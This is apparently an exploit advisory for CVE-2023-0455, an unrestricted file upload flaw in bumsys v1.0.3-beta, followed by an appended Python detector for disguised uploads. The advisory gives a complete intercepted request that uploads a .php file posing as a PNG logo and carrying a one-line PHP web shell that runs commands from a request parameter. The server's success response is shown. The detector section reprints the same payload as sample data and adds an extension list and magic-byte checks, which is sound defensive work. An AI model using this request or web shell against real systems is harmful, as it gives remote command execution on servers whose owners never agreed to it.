Exploit Title: unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork: NA
Date: 19-01-2023
Exploit Author: Affan Ahmed
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE: CVE-2023-0455
=====================================
Steps to reproduce
=====================================
- Navigate to this URL: https://demo.bumsys.org/settings/shop-list/
- Click the "Action" button to edit the shop profile
- Click the "Choose Logo" button to upload an image
- Intercept the POST request and make the following changes.
Burpsuite Request
=================================================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; CurrencySymbol=%EF%B7%BC; keepalive=1; __0BB0B4AAF0F729565DBDB80308ADAC3386976AD3=9LQOP41SSSSG3I9TRH73ENQBI0I7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-CSRF-Token: 78ABB0CC27AB54E87F66E8160DAB3AB48261A8B4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryno0QAD84EKUMUGAA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopName"

test
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopAddress"

test
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopCity"

test
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopState"

TestState
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopCountry"

Testind
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopEmail"

[email protected]
------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopInvoiceFooter"

------WebKitFormBoundaryno0QAD84EKUMUGAA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>
==================================================================================================
Burpsuite Response
==================================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class="alert alert-success">Shop successfully updated.</div>
==================================================================================================
VIDEO-POC :
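An added detection example, not part of this advisory or of the bumsys project: a small multipart/form-data parser that flags a file part like the one in the request above, a ".php" filename declared as image/png whose bytes begin with a PHP open tag, so an upload gateway, WAF rule or log-review script can spot this bypass pattern. The boundary and sample body are constructed from the request shown; the executable-extension list and magic-byte table are assumptions of this example.

```python
import re
BOUNDARY = "----WebKitFormBoundaryno0QAD84EKUMUGAA"
# Constructed sample body: one ordinary field plus the logo part from the
# advisory (a .php file declared as image/png carrying a PHP one-liner).
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="shopName"\r\n\r\ntest\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"\r\n'
    "Content-Type: image/png\r\n\r\n"
    "<?php echo system($_REQUEST['dx']); ?>\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

# Extensions a PHP-enabled server will execute, and magic bytes per image type (assumed lists).
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff",
         "image/gif": b"GIF8"}

def parse_parts(body: bytes, boundary: str):
    """Yield (headers, content) for each part of a multipart/form-data body."""
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter
        raw_headers, _, content = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in raw_headers.strip().split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        yield headers, content.removesuffix(b"\r\n")

def inspect_upload(body: bytes, boundary: str) -> list[str]:
    """Return findings for file parts that look like a script disguised as an image."""
    findings = []
    for headers, content in parse_parts(body, boundary):
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if not match:
            continue  # plain form field, not a file
        name = match.group(1)
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        declared = headers.get("content-type", "").lower()
        if ext in EXEC_EXTS:
            findings.append(f"{name}: executable extension .{ext}")
        if declared in MAGIC and not content.startswith(MAGIC[declared]):
            findings.append(f"{name}: declared {declared} but magic bytes do not match")
        if content.lstrip().startswith(b"<?php"):
            findings.append(f"{name}: body contains a PHP open tag")
    return findings
```

The same three checks (extension allowlist, magic bytes against the declared type, and a content scan) are what the server-side upload handler should enforce before writing the file under a web-served directory; storing the logo under a server-generated name rather than the client-supplied filename removes the extension problem entirely.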